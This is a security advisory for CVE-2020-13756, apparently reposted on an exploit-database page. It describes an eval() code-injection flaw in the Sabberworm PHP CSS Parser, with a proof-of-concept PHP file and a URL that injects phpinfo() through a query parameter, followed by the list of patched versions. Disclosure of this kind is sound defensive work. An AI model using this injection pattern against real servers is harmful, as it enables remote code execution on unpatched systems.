Lucene search
K

Sabberworm PHP CSS Code Injection Vulnerability

🗓️ 03 Jun 2020 00:00:00Reported by Eldar MarcussenType 
zdt
 zdt
🔗 0day.today👁 98 Views

Sabberworm PHP CSS Code Injection Vulnerability, remote code execution via uncontrolled data in Sabberworm PHP CSS Parse

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Code Injection in Sabberworm Php_Css_Parser
6 Dec 202509:33
githubexploit
ATTACKERKB
CVE-2020-13756
3 Jun 202000:00
attackerkb
Information Security Automation
May
23 May 202521:25
avleonov
Circl
CVE-2020-13756
18 Dec 202017:23
circl
Check Point Advisories
HTTP Headers Remote Code Execution (CVE-2020-10826; CVE-2020-10827; CVE-2020-10828; CVE-2020-13756; CVE-2021-1472; CVE-2021-1473)
3 Jun 202000:00
checkpoint_advisories
CVE
CVE-2020-13756
3 Jun 202013:46
cve
Cvelist
CVE-2020-13756
3 Jun 202013:46
cvelist
Debian
[SECURITY] [DLA 4333-1] php-horde-css-parser security update
14 Oct 202516:52
debian
Debian CVE
CVE-2020-13756
3 Jun 202013:46
debiancve
Tenable Nessus
Debian dla-4333 : php-horde-css-parser - security update
14 Oct 202500:00
nessus
Rows per page
Sabberworm PHP CSS parser - Code injection
===============================================================================

Identifiers
-------------------------------------------------
* CVE-2020-13756


CVSSv3 score
-------------------------------------------------
8.6 - [AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L](
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L&version=3.1
)


Vendor
-------------------------------------------------
Sabberworm - https://github.com/sabberworm/PHP-CSS-Parser


Product
-------------------------------------------------
A Parser for CSS Files written in PHP. Allows extraction of CSS files into
a data structure, manipulation of said structure and output as (optimized)
CSS.


Affected versions
-------------------------------------------------
 - All versions prior to the fixed versions listed below


Credit
-------------------------------------------------
Eldar Marcussen - justanotherhacker.com


Vulnerability summary
-------------------------------------------------
The Sabberworm PHP CSS Parser evaluates uncontrolled data which may result
in remote code execution if the affected function is called with attacker
controlled data.


Technical details
-------------------------------------------------
The function `allSelectors` in
`lib/Sabberworm/CSS/CSSList/CSSBlockList.php` on line `64` interpolates
untrusted data inside an `eval()` operation on line `73`.
https://github.com/sabberworm/PHP-CSS-Parser/blob/master/lib/Sabberworm/CSS/CSSList/CSSBlockList.php#L73

The function `allSelectors` is called via the function
`getSelectorsBySpecificity` in `lib/Sabberworm/CSS/CSSList/Document.php`
which is the class object returned from the `parse()` function in
`lib/Sabberworm/CSS/Parser.php`. If an attacker is able to supply or
influence the content of the data passed to the `allSelectors` or
 `getSelectorsBySpecificity` functions, the server will execute attacker
controlled code.

```php
protected function allSelectors(&$aResult, $sSpecificitySearch = null) {
    $aDeclarationBlocks = array();
    $this->allDeclarationBlocks($aDeclarationBlocks);
    foreach ($aDeclarationBlocks as $oBlock) {
        foreach ($oBlock->getSelectors() as $oSelector) {
            if ($sSpecificitySearch === null) {
                $aResult[] = $oSelector;
            } else {
                $sComparison = "\$bRes = {$oSelector->getSpecificity()}
$sSpecificitySearch;";
                eval($sComparison);
                if ($bRes) {
                    $aResult[] = $oSelector;
                }
            }
        }
    }
}
```


Proof of concept
-------------------------------------------------
The following evidence is provided to illustrate the existence and
exploitation
of this vulnerability:

Save the following code as csspwn.php
```php
<?php
use Sabberworm\CSS\Parser;

$css="#test .help,\n#file,\n.help:hover,\nli.green,\nol li::before {\n
   font-family: Helvetica;\n}";

$oCssParser = new Sabberworm\CSS\Parser($css);
$oDoc = $oCssParser->parse();
$oDoc->getSelectorsBySpecificity('> '.$_GET['n']);
?>
```
Serve the page via `php -S 0:8888` then open the following URL:
http://localhost:8888/csspwn.php?n=100;phpinfo()

Solution
-------------------------------------------------
Upgrade to one of the following versions:
  1.0.1
  2.0.1
  3.0.1
  4.0.1
  5.0.9
  5.1.3
  5.2.1
  6.0.2
  7.0.4
  8.0.1
  8.1.1
  8.2.1
  8.3.1

Timeline
-------------------------------------------------
Date        | Status
------------|---------------------
01-JUN-2020 | Reported to vendor
01-JUN-2020 | Patch available
02-JUN-2020 | Public disclosure

#  0day.today [2020-07-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation